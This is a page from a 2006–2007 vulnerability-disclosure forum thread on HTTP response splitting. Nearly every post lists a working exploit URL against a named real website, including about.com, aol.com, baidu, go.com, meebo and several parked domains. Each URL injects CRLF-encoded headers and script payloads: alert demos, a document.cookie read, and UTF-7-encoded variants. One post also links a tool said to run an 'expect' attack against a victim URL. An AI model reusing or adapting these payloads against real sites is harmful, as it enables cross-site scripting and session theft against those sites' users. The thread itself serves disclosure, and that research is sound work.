Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: Previous12
Current Page: 2 of 2
Re: HTTP Response splitting
Posted by: maluc
Date: December 03, 2006 03:59AM

from unsticky's redirect:

http://clk.about.com/?zi=1/XJ&sdn=asdf%0AContent-Type:html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E multiple splitting from the set-cookies..
http://www.aol.com/redir.adp?_e_t=ap&_a_v=2.0&_a_i=100124311x1099139803x1076741866&_url=%0AContent-Type:html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

-maluc

Options: ReplyQuote
Re: HTTP Response splitting
Posted by: maluc
Date: December 03, 2006 04:36AM

from alf's redirects:

http://toi.passul.t-online.de/cgi-bin/XP/toi/pers/dsl/mehr01,toi/pers/ziel,0,2,1?l=%0AContent-Type:html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
http://www.arcor.de/home/extern_track.php?name=click-shopping&kat=nav&url=%0AContent-Type:html%0A%0A%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E

-maluc

Options: ReplyQuote
Re: HTTP Response splitting
Posted by: maluc
Date: December 03, 2006 05:02AM

from wwweirdo's redirect:

http://a.tribalfusion.com/h.click/FUCWKBJMNEKLHKPBRNWKCKJNRLSUQEYTQFCKKGQPTQRXIKJIGGOMHHDIKJSWRLNPIUEWKHHNMHOFEJOM/%0AContent-Type:html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

-maluc



Edited 1 time(s). Last edit at 12/03/2006 05:28AM by maluc.

Options: ReplyQuote
Re: HTTP Response splitting
Posted by: maluc
Date: December 16, 2006 10:38PM

http://ma.baidu.com/ma/rcv/click.php?url=%0AContent-Type:html%0A%0A%3Cscript%3Ealert(%22xss'd%22)%3C/script%3E

-maluc

Options: ReplyQuote
Re: HTTP Response splitting
Posted by: trev
Date: January 23, 2007 06:07AM

http://transfer.go.com/cgi/transfer.dll?goto=http://%0AContent-Type:%20text/html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

Edit: transfer.dll and transfer.pl seem to be the same thing -
http://transfer.go.com/cgi/transfer.pl?goto=http://%0AContent-Type:%20text/html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E



Edited 1 time(s). Last edit at 02/08/2007 12:31PM by trev.

Options: ReplyQuote
Re: HTTP Response splitting
Posted by: trev
Date: January 23, 2007 11:18AM

Edit: sorry, wrong thread



Edited 1 time(s). Last edit at 01/23/2007 11:19AM by trev.

Options: ReplyQuote
Re: HTTP Response splitting
Posted by: unsticky
Date: March 04, 2007 03:52PM

http://wwwl.meebo.com/redirect.php?%0d%0a%0d%0a%3Cscript%3Ealert(document.cookie);%3C/script%3E

Options: ReplyQuote
Re: HTTP Response splitting
Posted by: SW
Date: March 05, 2007 12:39PM

What does this do???

http://ha.ckers.org/expect.swf?http://www.victim.com/

Options: ReplyQuote
Re: HTTP Response splitting
Posted by: rsnake
Date: March 05, 2007 04:12PM

SW, try it in IE on older Apache installs. It will run the expect vulnerability against it.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: HTTP Response splitting
Posted by: trev
Date: March 10, 2007 10:02PM

All those parked domains, they must be good for something...

http://adoptacabin.com/?rid=file:%0AContent-Type:%20text/html;charset=UTF-7%0A%0A%2BADw-script%2BAD4-alert('XSS');%2BADw-/script%2BAD4%2D
http://imageintel.com/?rid=file:%0AContent-Type:%20text/html;charset=UTF-7%0A%0A%2BADw-script%2BAD4-alert('XSS');%2BADw-/script%2BAD4%2D
http://clip2.com/?rid=file:%0AContent-Type:%20text/html;charset=UTF-7%0A%0A%2BADw-script%2BAD4-alert('XSS');%2BADw-/script%2BAD4%2D
http://powerize.com/?rid=file:%0AContent-Type:%20text/html;charset=UTF-7%0A%0A%2BADw-script%2BAD4-alert('XSS');%2BADw-/script%2BAD4%2D
http://pcvp.org/?rid=file:%0AContent-Type:%20text/html;charset=UTF-7%0A%0A%2BADw-script%2BAD4-alert('XSS');%2BADw-/script%2BAD4%2D
http://liquid2k.com/?rid=file:%0AContent-Type:%20text/html;charset=UTF-7%0A%0A%2BADw-script%2BAD4-alert('XSS');%2BADw-/script%2BAD4%2D
http://womenconnect.com/?rid=file:%0AContent-Type:%20text/html;charset=UTF-7%0A%0A%2BADw-script%2BAD4-alert('XSS');%2BADw-/script%2BAD4%2D

800.000 more of those: http://www.buydomains.com/

Options: ReplyQuote
Pages: Previous12
Current Page: 2 of 2


Sorry, only registered users may post in this forum.